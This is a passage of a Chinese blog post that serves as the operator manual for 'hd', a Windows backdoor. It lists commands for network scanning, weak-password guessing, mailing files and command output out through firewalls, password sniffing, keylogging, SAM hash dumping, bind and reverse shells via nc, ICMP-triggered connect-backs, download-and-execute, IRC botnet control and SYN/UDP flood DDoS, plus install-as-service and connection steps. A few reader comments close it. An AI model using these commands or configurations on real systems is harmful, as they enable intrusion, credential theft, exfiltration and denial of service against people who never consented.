c. 如果扫描192.168.0.1-192.168.0.254这个段的21端口,记录包含”Serv-U”的IP到servu.txt文件,用如下命令:
hd -hbs 192.168.0.1-192.168.0.254 /p 21 /s “Serv-U” /l servu.txt
d. 如果扫描192.168.0.1-192.168.0.254这个段的3389端口,用如下命令:
hd -hbs 192.168.0.1-192.168.0.254 /p 3389 /o
e. 如果扫描192.168.0.1-192.168.0.254这个段的80的Banner,用如下命令:
hd -hbs 192.168.0.1-192.168.0.254 /w
f. 如果要扫描www.n0p.org的常用端口并获取Banner,用如下命令:
hd -hbs www.n0p.org /m /b
g. 如果要扫描www.n0.org的多个端口,用如下命令:
hd -hbs www.n0p.org /m 21,23,25,80-5000,8080
即端口用”,”号分隔,端口范围用”-“号分隔。

7. 命令行Ping/Name/SQL/IPC扫描器

使用命令: hd -g
帮助信息:
[Usage:]
-hscan <HostName|<StartIP[-EndIP]> [Options]

[Options:]
/a             Scan All, default on
/c             Check host state, Ping first
/f             Faster Scan
/i             IPC User Scan
/n             Name Scan
/p             Ping Scan
/s             SQL User Scan
/d <Delay>     Set timeout, between 1-20, default is 5
/l <Logfile>   Log file name, default is hscan.txt
/t <Thread>    Scan thread number, between 1-1000, default is 200

参数解释:
a. <HostName|<StartIP[-EndIP]> 为要扫描的IP地址或主机名,如果要扫描一段IP地址,格式为 开始IP-结束IP。
b. /a 为扫描所有项目,默认打开。
c. /c 为先ping再扫描。
d. /f 为快速扫描(只猜空密码和与用户名有关的密码)。
e. /i 进行IPC扫描。
f. /n 进行Name扫描。
g. /p 进行Ping扫描。
h. /s 进行SQL扫描。
i. /d <Delay> 为建立的TCP连接的延时,范围为1-20秒,默认为5秒。
j. /l <Logfile> 为记录扫描结果信息的日志文件。默认为hbs.txt。
k. /t <Thread> 为扫描的线程,范围为1-1000,默认为200。建议ADSL用户设到100以下。

使用示例:
a. 如要要扫描192.168.0.1的所有项目,用如下命令:
hd -hscan 192.168.0.1
b. 如果要扫描192.168.0.1-192.168.0.254的SQL和IPC简单密码,用如下命令:
hd -hscan 192.168.0.1-192.168.0.254 /s /i
c. 如果要扫描192.168.0.1-192.168.0.254的活动机器的SQL和IPC简单密码,用如下命令:
hd -hscan 192.168.0.1-192.168.0.254 /s /i /c

8. 命令行邮件发送器

使用命令: hd -m
帮助信息:
Usage(1.3b1):-m [-switch] <MailTo> <AttachedFile> [Proxy IP] [Proxy Port]

switch list:
-s      [email protected]  user define from header
-n      do not attach file
-c      “route print”  user define command
-h      these info
参数解释:
a. <MailTo> 为收信的信箱地址。
b. <AttachedFile> 为要带的附件,该功能主要是为从内网穿透防火墙传文件到外网而写。
c. [Proxy IP] 为支持邮件转发的SMTP邮件服务器IP地址,或者做了到SMTP邮件服务器的SMTP端口的端口转发的IP地址。
d. [Proxy Port] 为支持邮件转发的SMTP邮件服务器SMTP端口,或者做了到SMTP邮件服务器的SMTP端口的端口转发的转发端口。
e. -s [email protected] 为定义发件人,有的邮件服务器有反垃圾邮件或需要验证发件人的,用这个定义,默认为随机产生地址。
f. -n 如果不带附件,用这选项。
g. -c “command” 为邮件发送的内容指定为该命令的执行结果,默认为”route print”的执行结果。
h. -h 显示帮助信息。
使用示例:
a. 如果给[email protected] 发送 xxx.rar,使用命令为:
hd -m [email protected] xxx.rar
b. 如果给 [email protected] 发送 xxx.rar,通过 192.168.0.1的99端口进行转发,使用命令为:
hd -m [email protected] xxx.rar 192.168.0.1 99
c. 如果给[email protected]发送”net user”命令的执行结果而不带附件,使用命令为:
hd -m -n -c “net user” [email protected]

9. 包转发功能

使用命令: hd -p
帮助信息:
[Usage of Packet Transmit:]
-p -listen ConnectPort TransmitPort
-p -tran   ConnectPort TransmitHost TransmitPort
-p -slave  ConnectHost ConnectPort TransmitHost TransmitPort

[Option:]
-log logfile
参数解释:
1. -listen 监听功能。支持 本机监听端口 <-> 本机转发端口 的转发。
2. -tran 简单端口转发功能。支持 本机端口 <-> 转发机器:转发端口 的转发。
3. -slave 双向转发功能。支持 监听机器:监听端口 <-> 转发机器:转发端口 的转发。
4. -log 支持日志记录。可以记录转发时的数据包内容。

10. Socks5功能

使用命令: hd -s
帮助信息:
[Usage of Socks5 Proxy:]
-s -bind [ReBindIP] [BindPort]              Default:ALL 8009
-s -connect ConnectHost [ConnectPort]       Default:80
-s -listen [ConnectPort] [ListenPort]       Default:80 8009

[Option:]
-log logfile
参数解释:
1. -bind 监听功能。为创建一个端口进行Socks5服务,支持端口重定向。
2. -connect 反连Socks5功能。
3. -listen 双向转发功能。为反连Socks5连接的端口。
4. -log 支持日志记录。可以记录数据包内容。
使用示例:
1. 端口重用Socks5:
hd -s -bind 10.10.10.222 80
注: 这里的IP不要使用127.0.0.1,而应该使用一个网卡接口的IP。
2. 反连Socks5示例:
a. 在你接受反连的那台机器运行:
hd -s -listen 80 8009
b. 在反连那台机器运行:
hd -s -connect 接受反连IP 80
如: hd -s -connect 10.10.10.222 80
c. 使用SocksCap之类的连接接受反连IP机器的ListenPort即可。 上例为8009。
如果连接Listen服务器不成功,Connect 10分钟后才会连接第二次。

11. 命令行Sniffer帮助信息

使用命令: hd -x
帮助信息:
[Usage of Sniffer:]
-x [Option]
[Option]
/h          Show Help
/t          Output TCP  Packets
/u          Output UDP  Packets
/i          Output ICMP Packets
/p          Decode Packets (default OFF)
/v          Output Packets Info
/l          Output Password Strings (default ON, save to:hdsys.dat)
/c          Close Console (Hide Mode)
/b:BindIP   Sniffer Bind IP (default ALL)
/f:FromIP   Output Packets FromIp=fromIP (default ALL)
/d:DestIP   Output Packets DestIp=destIP (default ALL)
/s:String   Output Packets Include sensitive String(TCP only)
/o:Port     Output Packets from or to the port(ICMP is TYPE)
参数解释:

12. 其他功能

使用命令: hd -o
帮助信息:
[Usage of Tools:]
-bind           Bind Shell                   // 监听一个Shell
-client         Backdoor Client              // 后门客户端功能
-config         Config Parameter             // 后门配置功能
-connect        ConnectBack Shell            // 反连一个Shell
-ddos           DDoS Attack                  // 拒绝服务功能
-enum           Enum+                        // Enum功能
-enumhost       Enum Network Hosts           // 列举网络机器
-findpass       Find User Password           // 查找密码
-fport          Port to File and Process     // 端口对应进程
-hash           HBot PassHash                // 产生HBot的登陆hash
-hbs            Port Banner Scanner          // 命令行端口banner扫描器
-hget           Get HTTP/FTP File            // 命令行下载文件
-hmb            Domain MX Banner Finder      // Domain MX Banner获取器
-hscan          Ping/Name/SQL/IPC Scanner    // 命令行Ping/Name/SQL/IPC扫描器
-keylog         Keyboard Log                 // 命令行键盘记录器
-logoff         Logoff Windows               // 注销系统
-msn            MSN Password Decode          // MSN注册表密码解码
-packet         Packet Transmit              // 包转发功能
-pcanywhere     Pcanywhere Password File Decode // pcanywhere 密码文件解码
-pskill         Kill a Process               // 杀掉进程
-pslist         List Process                 // 查看进程
-pwdump         SAM Password Hash Dumper     // 注册表SAM密码HASH获取器
-reboot         Reboot System                // 重启系统
-safedel        Safe Delete File             // 安全删除文件功能
-server         Create a Server              // 创建一个后门Server
-service        Services Operate             // 服务操作功能
-shutdown       Shutdown System              // 关闭系统
-smail          Command Line SendMail        // 命令行邮件发送器
-sniffer        Command Line Sniffer         // 命令行Sniffer
-socks5         Socks5 Proxy                 // Socks5代理功能
-su             Like UNIX su Tool
-sysinfo        System Info                  // 显示系统信息
-telnet         Telnet to Target             // Telnet功能
-vnc            VNC Password Decode          // VNC 注册表密码解码

四. 后门内置shell命令使用方法介绍 (后门Shell里运行命令将得到详细的在线帮助)

1. 后门管理

a. HELP/H/MAN/?

命令解释: 显示后门帮助
帮助信息:
[Help Message:]

后门管理
==================================================
?/H/HELP/MAN      Show this Message
CLIENT/HC         Backdoor Client
CONFIG            Config the Parameter
EXIT              Exit Shell
ID                Show Door ID
KICK              Kick Shell
NOP/NOOP          Keep Active
RELOAD            Reload Config Data
REMOVE            Remove this Program
SHOW              Show Config Data
UPDATE            Update Backdoor
VER/VERSION       Show Version Message
WHO/ONLINE        List Client

文件目录操作
————————————————–
CD                Change Directory
COPY/CP           Copy file or Directory
DEL/RM/RD         Delete file or Directory
DIR/LS/LIST       List file and Directory
FIND              Find file
MOVE/MV           Move file or Direcotry
MD/MKDIR          Create Directory
PWD               Get Current Dirctory
REN/RENNAME       Renname file or Directory
SDEL/SAFEDEL      Safe Delete File or Direcotry
TYPE/CAT          Type text file

执行程序操作
————————————————–
CMD/DOS/SHELL     Switch to MS-DOS Mode
EXE               CreateProcess run file
EXEC              Winexec run file
OPEN              ShellExecute run file
SYSTEM            System run file

系统操作
————————————————–
DATE              Show Date and Time
LOCK/UNLOCK       Lock/Unlock the mouse
LOGOFF            Logoff System
REBOOT            Reboot System
SHUTDOWN          Shutdown System
SYS/INFO          View System info

后门Shell操作
————————————————–
BIND              Bind Shell
CONNECT           ConnectBack Shell
SERVER            Create a Server
TELNET/LOGIN      Telnet to Target

代理操作
————————————————–
KILLPROXY/KP      Kill a TCP Proxy
LISTPROXY/LP      List all TCP Proxy
PROXY/HTRAN       Create a TCP Proxy

拒绝服务操作
————————————————–
DDOS/HGOD         DDoS Attack
KILLDDOS/KD       Kill a DDoS Attack
LISTDDOS/LD       List all DDoS Attack

附加功能操作
————————————————–
CLIP              Get Clipboard Text
FINDPASS          Find User Password
FPORT             Port to Process
GET/PUT           Get or Put file.(Please use Client)
HASH              HBot PassHash
HBOT              HBot Cortrol
HBS               Port Banner Scanner
HGET              Get the file from HTTP or FTP
HMB               Domain MX Banner Finder
I3389/S3389       Install Termsrv, Show & Set Port
KEYLOG/STOPK      Start/Stop Keyboard Log
PCANYWHERE        PCAnywhere Password file Decode
PSKILL/KILL       Kill the Process
PSLIST/PS         List all Process
PWDUMP            SAM Password Hash Dumper
SCREEN            Capture Screen
SERVICE           All Service Operate
SMAIL             Send a Mail
SNIFFER/STOPS     Start/Stop Password Sniffer
SU                Like UNIX su Tool
VNC               VNC Password Decode
==================================================

b. CLIENT/HC

命令解释: 后门客户端功能
帮助信息:
[Usage of Door Client:]
client <hosts.txt|TargetIP> <Command> [Option]
client -shell [Sniffer BindIP]

[Command:]
Please See the BackDoor Shell Help Message!
[Option:]
-i:SEQ         Set the BackDoor IP Packet SEQ. Default is 10101.
-l:SourcePort  Use for TCP/UDP Send Mode. Default is 1025.
-m:SendMode    Set the TCP/UDP/ICMP Send Packet Mode. Default is ICMP.
-p:TargetPort  Use for TCP/UDP Send Mode. Default is 80.
-s:SourceIP    Set the Source IP. Default is your Real IP.
-t:ICMPType    Set the ICMP Type. Default is 8(ICMP_ECHO).
[Example:]
client 192.168.0.1 “”bind 99″”
client 192.168.0.1 “”bind 99″” -m:tcp -l:1025 -p:80 -s:192.168.0.2
client 192.168.0.1 “”connect 192.168.0.2 53″”
client hosts.txt   “”hgod 192.168.0.2 80″”

c. CONFIG

命令解释: 后门配置
帮助信息:
[Usage of Config:]
config -show
config -type      <0,1,2,3,4>
config -id        <DoorID>
config -port      <BindPort>
config -url       <DownloadURL> [SleepTime]
config -cb        <ConnectHost> <Port> [SleepTime]
config -hbot      <Server> <Port> <Channel> [ChannelPass]
config -time      <SleepTime>
config -ip        <SnifferIP>
config -log       <logfile>
config -ddostype  <0,1,2,3,4>
config -ddos      <TargetHost> <TargetPort> <ThreadNum>
config -sockstype <0,1,2,3>
config -bind      [ReBindIP] <BindPort>
config -connect   <ConnectHost> <ConnectPort>
config -listen    <ConnectPort> <ListenPort>
————————————————–
DoorType:       0.Disable 1.BindPort 2.ConnectBack 3.DownloadURL 4.HBot
DDoSType:       0.Disable 1.SYN      2.UDP         3.ICMP        4.IGMP
SocksType:      0.Disable 1.Bind     2.Connect     3.Listen
d. EXIT

命令解释: 退出后门Shell

e. ID

命令解释: 显示后门ID()
使用帮助:
1. DoorShell里可以用Config -id <DoorID> 进行配置。
2. CMDShell里可以用hd -c -id <DoorID> 进行配置。

f. KICK

命令解释: 踢掉Shell
帮助信息:
Usage of Kick:  kick <NO|ALL>
参数解释:
1. <No> 为用WHO/ONLINE命令列举出所有Shell的ID条目编号。
2. <All> 为踢掉除当前连接外的所有Shell。

g. NOP/NOOP

命令解释: 空操作,保持连接

h. RELOAD

命令解释: 重新装入配置

i. REMOVE

命令解释: 删除后门

j. SHOW

命令解释: 查看后门配置

k. UPDATE

命令解释: 升级后门
使用帮助:
Usage of Update:    update <URL|LocalFilename> [reinstall]

l. VER/VERSION

命令解释: 显示后门版本信息

m. WHO/ONLINE

命令解释: 查看在线Shell

2. 文件目录操作

a. CD

命令解释: 切换目录
帮助信息:
Usage of CD: cd <Directory>

b. COPY/CP

命令解释: 拷贝文件或目录
帮助信息:
Usage of Copy: copy <FileName> <NewPath>

c. DEL/RM/RD

命令解释: 删除文件或目录
帮助信息:
Usage of Delete: del <FileName|DirectoryName>

d. DIR/LS/LIST

命令解释: 查看文件列表
帮助信息:
Usage of Dir: dir [FileName|DirectoryName]

e. FIND

命令解释: 查找文件
帮助信息:
Usage of Find: find <SearchDir> <FindFileName>

f. MOVE/MV

命令解释: 移动文件或目录
帮助信息:
Usage of Move: move <Path> <NewPath>

g. MD/MKDIR

命令解释: 创建目录
帮助信息:
Usage of Mkdir: mkdir <DirectoryName>

h. PWD

命令解释: 查看当前目录

i. REN/RENNAME

命令解释: 改名文件或者目录
帮助信息:
Usage of Rename: ren <FileName> <NewFileName>

j. SDEL/SAFEDEL

命令解释: 安全删除文件或者目录
帮助信息:
Usage for Safe Delete Files:
safedel [-p passes] [-s] [-q] <File or Directory>
safedel [-p passes] -z [Drive Letter]
[Opation:]
-p passes  Specifies Number of Overwrite Passes (Default:1)
-s         Recurse Subdirectories
-q         Don’t print errors (Quiet)
-z         Clean Free Space

k. TYPE/CAT

命令解释: 查看文本文件
帮助信息:
Usage of TypeFile: type <TextFileName>

3. 执行程序操作

a. CMD/DOS/SHELL

命令解释: 切换到cmd shell

b. EXE

命令解释: 用CreateProcess()运行文件,并显示结果。(可以在cmd.exe不存在的时候使用)
帮助信息:
Usage of Exe: exe <File> [Parameter]

c. EXEC

命令解释: 用Winexec()运行文件
帮助信息:
Usage of Exec: exec <File>

d. OPEN

命令解释: 用ShellExecute()运行文件
帮助信息:
Usage of Open: open <File>

e. SYSTEM

命令解释: 用System()运行文件
帮助信息:
Usage of System: system <File>

4. 系统操作

a. DATE

命令解释: 显示系统当前日期和时间

b. LOCK/UNLOCK

命令解释: 锁定/解除锁定鼠标

c. LOGOFF

命令解释: 注销系统

d. REBOOT

命令解释: 重启系统

e. SHUTDOWN

命令解释: 关闭系统

f. SYS/INFO

命令解释: 查看系统信息

5. 后门Shell操作

a. BIND

命令解释: 创建一个bind Shell到指定端口
帮助信息:
Usage of Bind: bind <port>

b. CONNECT
命令解释: 反连一个Shell到指定IP的端口
帮助信息:
Usage of Connect: connect <ip> <port>

c. SERVER
命令解释: 创建一个能多次连接的BindShell到指定端口
帮助信息:
Usage of Server: server <port>

d. TELNET/LOGIN
命令解释: 远程连接,可用于登陆另一个监听Shell
帮助信息:
Usage for Telnet: telnet <Port>

6. 代理操作

a. KILLPROXY/KP

命令解释: 终止代理任务
帮助信息:
Usage of Stop a Proxy: killproxy <NO|ALL>

b. LISTPROXY/LP

命令解释: 列举代理任务

c. PROXY/HTRAN

命令解释: 创建代理任务
帮助信息:
[Usage of Socks5 Proxy:]
htran -bind [RebindIP] [BindPort]              Default:8009
htran -connect ConnectHost [ConnectPort]       Default:80
htran -listen [ConnectPort] [ListenPort]       Default:80 8009

[Usage of Packet Transmit:]
htran -listen2 ConnectPort TransmitPort
htran -tran ConnectPort TransmitHost TransmitPort
htran -slave ConnectHost ConnectPort TransmitHost TransmitPort

7. 拒绝服务攻击操作

a. DDOS/HGOD

命令解释: 创建拒绝服务攻击任务
帮助信息:
[Usage of DDoS Attack:]
ddos <Target> <Port1,Port2,Port3…> [Option]
<Target>       Flooding Host IP|Hostname.
<Port1,…>    Flooding Host Port. Port Num must <10.

[Option:]
-a:AttackTime  The Time(minute) of Attack. Set 0 for Always. Default is 0.
-b:Packsize    The Size of Packet, for UDP/ICMP/IGMP Mode. Default is 1000.
-d:Delay       Delay of Send Packet, for UDP/ICMP/IGMP Mode. Default is 10ms.
-m:Mode        Attack Mode, Use SYN/UDP/ICMP/IGMP. Default is SYN.
-p:SourcePort  Set SourcePort, Default is Random.
-s:SourceIP    Set SourceIP, Default is Random.
-t:Thread      The Threads Num for Flooding, Max is 50, Default is 2.

b. KILLDDOS/KD

命令解释: 终止拒绝服务攻击任务
帮助信息:
Usage of stop a DDoS Attack: killddos <No|ALL>

c. LISTDDOS/LD

命令解释: 列举拒绝服务攻击任务

8. 其他功能操作

a. CLIP

命令解释: 查看剪切板内容

b. FINDPASS

命令解释: 查找内存中的管理员密码

c. FPORT

命令解释: 端口对应进程

d. GET/PUT

命令解释: 上传下载文件(必须使用后门客户端连接才可用)
帮助信息:
get <remotefilename> [localfiename]
put <remotefilename> [localfiename]

e. HASH

命令解释: 产生HBot登陆Hash
帮助信息:
Usage of HBot Hash: hash <HostStrings>

f. HBOT

命令解释: 开始/停止 HBot任务
帮助信息:
Usage of HBot:
hbot -stop
hbot -start [Channel] [Server] [ServerPort] [ChannelPass] [ServerPass]

g. HBS

命令解释: 端口Banner扫描器
帮助信息:
[Usage:]
hbs <StartIP> <EndIP> [Options]

[Options:]
/c             Check Web Version
/n             Note Port Open
/o             Scan Port Only
/w             Scan Web Version Only
/d <Delay>     TCP connect timeout, between 1-20, default is 5
/l <Logfile>   Log file name, default is hbs.txt
/p <Port>      Scan port, default is 25
/s <String>    Scan sensitive string
/t <Thread>    Scan thread number, between 1-1000, default is 200

h. HGET

命令解释: FTP/HTTP文件下载
帮助信息:

Usage of HGet: hget <HTTPFile|FTPFile> <LocalFile> [run]

hget http://www.xxx.com/test.exe test.exe run
hget ftp://user:[email protected]/test.exe test.exe

i. HMB

命令解释: 域名MX记录SMTP banner扫描器
帮助信息:
Usage of Domain MX Banner: hmb <DomainName|FileName>

j. HSCAN

命令解释: 命令行Ping/Name/SQL/IPC扫描器
帮助信息:
[Usage:]
-hscan <HostName|<StartIP[-EndIP]> [Options]

[Options:]
/c             Check host state, Ping first
/f             Faster Scan
/i             IPC User Scan
/n             Name Scan
/p             Ping Scan
/s             SQL User Scan
/d <Delay>     Set timeout, between 1-20, default is 5
/l <Logfile>   Log file name, default is hscan.txt
/t <Thread>    Scan thread number, between 1-1000, default is 200
注: 服务状态下IPC扫描不能用, 如果需要请用su切换到普通用户模式使用命令行扫描

j. I3389/S3389

命令解释: 安装终端服务/查看或设置终端端口
帮助信息:
Usage install 3389: i3389 [port]
Usage Show or Set 3389 Port: s3389 [port]

k. KEYLOG/STOPK

命令解释: 开始/停止键盘记录

l. PC/PCANYWHERE

命令解释: pcanywhere密码文件解码
帮助信息:
Usage of pcanywhere: pcanywhere <*.cif>

m. PSKILL/KILL

命令解释: 终止进程
帮助信息:
Usage of Pskill: pskill <PID|Name>

n. PSLIST/PS

命令解释: 列举进程

o. PWDUMP

命令解释: 获取注册表SAM密码HASH

p. SCREEN

命令解释: 抓屏
帮助信息:
Usage of Screen: screen <CapBmpFile>

q. SERVICE

命令解释: 服务操作
帮助信息:
[Usage of Service:]
service -<del|start|stop|pause|view|setstart|setdesc|install|list> <option>

[Option:]
-del       <ServiceName>
-start     <ServiceName>
-stop      <ServiceName>
-pause     <ServiceName>
-view      <ServiceName>
-setstart  <ServiceName> <StartType>
-setdesc   <ServiceName> <Description>
-install   <ServiceName> <DisplayName> <FilePath>
-list      <all|win32|driver|running>

r. SMAIL

命令解释: 命令行邮件发送器
帮助信息:
Usage(1.3b1): smail [-switch] <MailTo> <AttachedFile> [Proxy IP] [Proxy Port]

switch list:
-s      [email protected]  user define from header
-n      do not attach file
-c      “route print”  user define command
-h      these info

s. SNIFFER/STOPS

命令解释: 开始/停止FTP/POP3密码Sniffer
帮助信息:
Usage of Sniffer:  sniffer [Logfile]

t. SU

命令解释: 切换到其他用户
帮助信息:
su.exe like unix su tool,version 4.1

Usage: su <-u user>

u. VNC

命令解释: VNC注册表密码解码

五. HBot模块命令介绍
==========================================================================================

帮助信息:
================== [Help Message] ==================
0. about/a                                                           // 查看软件信息
1. action/ac       <Channel> <Action>                                // 发送动作
2. addalias/aa     <Alias> <Command>                                 // 添加别名
3. alias/al                                                          // 别名列表
4. changeto/ct     <Channel> [Channel Pass]                          // 改变当前频道
5. clone/c         <Host> <Port> <Channel> [Channel Pass]            // Clone一个新的IRC连接
6. cycle/cy        <Seconds> <Channel>                               // 几秒后重登频道
7. c_action/c_a    <ThreadNum> <Channel> <Action>                    // Clone/Spy 动作控制 ThreadNum为threads里的序号
8. c_join/c_j      <ThreadNum> <Channel> [Channel Pass]              // Clone/Spy 加入频道
9. c_mode/c_m      <ThreadNum> <IRC Mode>                            // Clone/Spy Mode指令
10. c_nick/c_n      <ThreadNum> <NickName>                            // Clone/Spy 改名
11. c_part/c_p      <ThreadNum> <Channel>                             // Clone/Spy 离开频道
12. c_privmsg/c_pm  <ThreadNum> <Channel|NickName> <Msg>              // Clone/Spy 消息指令
13. c_quit/c_q      <ThreadNum>                                       // Clone/Spy 退出
14. c_raw/c_r       <ThreadNUm> <IRC Command>                         // Clone/Spy 发送IRC命令
15. c_rnick/c_rn    <ThreadNum>                                       // Clone/Spy 随机改名
16. delay/de        <Seconds> <Bot Command>                           // 延时执行命令
17. die/d                                                             // 退出进程
18. disconnect/dc                                                     // 端口连接
19. dns/dn          <Host>                                            // 解析名称
20. exec/ec         <Command>                                         // Winexec执行命令
21. execute/e       <bShow> <Command>                                 // ShellExecute执行命令 bShow 设1为 显示执行,其他为隐藏
22. help/h          [Command]                                         // 查看帮助信息
23. hdoor/hd        <HD Shell Command>                                // 执行HDoor Shell指令并返回到IRC
24. http/ht         <Host> <Port> <Method> <URL> [Referer]            // http 测试
25. id/i                                                              // 查看后门ID
26. join/j          <Channel> [Channel Pass]                          // 加入频道
27. killthread/kt   <ThreadNum>                                       // 杀掉任务线程
28. log/lg                                                            // 查看日志
29. login/l         <PassHash>                                        // Hash验证登陆
30. logout/lo                                                         // 注销登陆
31. mode/m          <IRC Mode>                                        // 发送irc Mode指令
32. nick/n          <NickName>                                        // 改成指定的名称
33. nnick/nn        <Prefix> [Suffix] <RandomLength>                  // 随机改名为前缀/后缀+随机长度的名称
34. open/o          <File|Dir>                                        // 打开文件或者目录
35. part/pt         <Channel>                                         // 离开频道
36. prefix/pr       <Prefix>                                          // 修改命令前缀
37. privmsg/pm      <Channel|NickName> <Msg>                          // 发送IRC聊天信息
38. quit/q                                                            // 退出HBot
39. raw/ra          <IRC Command>                                     // 发送irc指令
40. reconnect/r                                                       // 重新连接
41. rem/re          <MasterNo>                                        // 注消who命令列表中的管理员
42. repeat/rp       <Times> <Bot Command>                             // 重复执行某个bot命令
43. rnick/rn                                                          // 随机改名
44. spy/sp          <NickName> <Host> <Port> <Channel> [Channel Pass] // 创建一个侦察线程到IRC频道
45. status/s                                                          // 查看状态
46. system/st       <Command>                                         // 用system执行系统命令
47. threads/t                                                         // 查看任务线程
48. visit/v         <Full URL> [Referer]                              // 访问网页
49. who/w                                                             // 查看已登陆的管理员
====================================================

使用说明:

1. 默认命令前缀<prefix>为 “.”,加在要执行命令的前面为<prefix>Command格式,如执行id命令为 “.id” (不要引号)。

2. 先登入irc服务器,然后whois一下自己,取出用户信息
如: [05:53] lion [email protected] :n0p
取”@”符号后的地址信息,上例为 218.19.45.179
然后运行 hd -hash 218.19.45.179 生成hash, 上例为 a71cc192a68321ec130
在irc窗口输入 “.login a71cc192a68321ec130″ (不要引号)。
成功与否会有提示。
同时支持 host 地址验证,默认没有打开,支持所有名称和地址登陆。
输入”.logout”为退出登陆。

3. help为查看IRC命令
不带参数查看所有命令。如: “.help”
带参数查看指定命令。如 “.help spy”

4. hdoor/hd 为HD Shell命令执行接口。
格式为: <prefix>hd <HD Command>
如果要执行hd里的cmd指令,为: “.hd cmd”
如果执行需要交互的指令,记得退出该命令,以释放管道和退出进程。

5. die命令会退出整个后门。***小心使用。

6. 其他就不介绍了,自己慢慢摸索。

六. 后门安装说明
==========================================================================================

1. 把程序改成任意名字如(hd.exe), 放到你想安装成服务的目录。
2. 再运行hd -install,程序会自动识别路径安装成服务。
3. 如果需要配置运行hd -c 来进行配置。
4. 完成后用hd -start启动服务

七. 后门连接说明
==========================================================================================

1. 获得一个bind shell(可能会监听两次)
ping 192.168.0.1 -l 2007 -n 1
nc -vv 192.168.0.1 138

2. 获得一个bind shell(不会监听两次) 能在装有ping door的机器上使用
ping 192.168.0.1 -l 2008 -n 1
nc -vv 192.168.0.1 138

3. 获得一个connect shell(可能会反连两次)
nc -l -vv -p 53
ping 192.168.0.1 -l 1007 -n 1

4. 获得一个connect shell(不会反连两次) 能在装有ping door的机器上使用
nc -l -vv -p 53
ping 192.168.0.1 -l 1008 -n 1

5. 连接到任意开放端口执行命令
连接到任何开放端口, 发送 [email protected]密码:命令
如要对方反连一个shell
nc 192.168.0.1 80
[email protected]:connect 192.168.0.2 53
其他命令请查看后门内置shell功能
程序运行功能后不会有返回信息

6. 使用client功能执行命令
hd -b IP “命令”
如要对方192.168.0.1反连一个shell到192.168.0.2的53端口, 用:
hd -b 192.168.0.1 “connect 192.168.0.2 53”

7. 使用client内置shell命令
运行hd -b
然后shell里使用set 来设置参数
一般只设置 target 和 command就可以。
如要对方192.168.0.1反连一个shell到192.168.0.2的53端口, 用:
hd -b
0>s

List Setting:
No  Parameter    Op Value
[0] TargetIP     =
[1] SourceIP     =
[2] TargetPort   =  80
[3] SourcePort   =  53
[4] Command      =
[5] Seq          =  10101
[6] SendMode     =  ICMP
[7] ICMPType     =  8
[8] GetResult    =  false
[9] Hostlist     =

[a] AutoLogin    =  true
[b] AutoKeep     =  true
[c] AutoScript   =  false
[d] KeepCommand  =  cd \
[e] Script       =
[f] LogConnect   =  true

Use “Set Parameter Op Value” or “Set No Op Value” for Set the Parameter.
Example:
Use “Set targetip to 192.168.7.1” for set the targetip, etc.
Use “Set 0 = 192.168.7.1” for set the targetip, etc.

1>s targetip = 192.168.0.1
2>s command = “connect 192.168.0.2 53″
3>g
Command length is:22
Command is:”connect 192.168.0.2 53”
Validate SEQ is:10101
Send Mode is:ICMP, Type is:8
Get Result is:flase
SourceIP is:192.168.0.2

Send to 192.168.0.1…Success!
0>

程序在shell模式对对方放送命令后没有返回信息。
如果要获得对方的shell和返回信息.请使用e命令进行切换。
如:
hd -b
0> s 0 = 127.0.0.1
1> e

Set Mode to SafeShell!

[email protected] # cmd
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

D:\>dir c:\
该操作请用getsafe代替.

set 命令支持很强大的定制功能.

8. 可以使用封装的命令
gb 让对方监听一个shell
gc 让对方反连一个shell (必须要有公网IP才能成功反连)
gs 获取对方加密的cmd shell (居于无连接的Sniffer形式,必须要有公网IP才能成功)
gr 获取对方加密的shell  (居于无连接的Sniffer形式,必须要有公网IP才能成功)
gl 获取已经反连的Shell

9. 可以用hd -c -type 配置后门形式, 让后门启动时执行相关功能
hd -c -type      <0,1,2,3,4>
DoorType:       0.Disable 1.BindPort 2.ConnectBack 3.DownloadURL 4.HBot
hd -c -port      <BindPort>
hd -c -hbot      <Server> <Port> <Channel> [ChannelPass]
hd -c -cb        <ConnectHost> <Port> [SleepTime]
hd -c -url       <DownloadURL> [SleepTime]
设置间隔时间。
hd -c -time      <SleepTime>

a. 如你要让他一个小时自动反连到 192.168.0.2 的53端口。用:
hd -c -cb 192.168.0.2 53 60
b. 自动下载URL文件并执行用
hd -c -url http://www.n0p.org/hd.txt
hd.txt里可以是多行的door shell命令.
c. 要监听端口用
hd -c -port 53

9. 可以用-c -ddostype 配置后门拒绝服务功能, 让后门启动时自动攻击
hd -c -ddostype  <0,1,2,3,4>
DDoSType:       0.Disable 1.SYN      2.UDP         3.ICMP        4.IGMP
hd -c -ddos      <TargetHost> <TargetPort> <ThreadNum>

10. 可以用-c -sockstype 配置后门代理功能, 让后门启动时自动执行。
hd -c -sockstype <0,1,2,3>
SocksType:      0.Disable 1.Bind     2.Connect     3.Listen
hd -c -bind      <BindPort>
hd -c -connect   <ConnectHost> <ConnectPort>
hd -c -listen    <ConnectPort> <ListenPort>

相关日志

楼被抢了 4 层了... 抢座Rss 2.0或者 Trackback

  • kyo

    果然很早啦~连迅雷安全中心都提示啦

  • buhu

    请教 hd -c 配置参数
    配置能写进去?我怎么发现没写进去呢。
    nc -l -p 53
    hd -b 192.168.0.1 “connect 192.168.0.2 53”
    这里反弹一个shell连接,需要输入pass,pass哪里设置的?说明文档也没翻到么。

  • Iory

    这个hd有木有源代码?非常想学习一下里面的反弹sockvap部分是怎么写的,不胜感激涕零

发表评论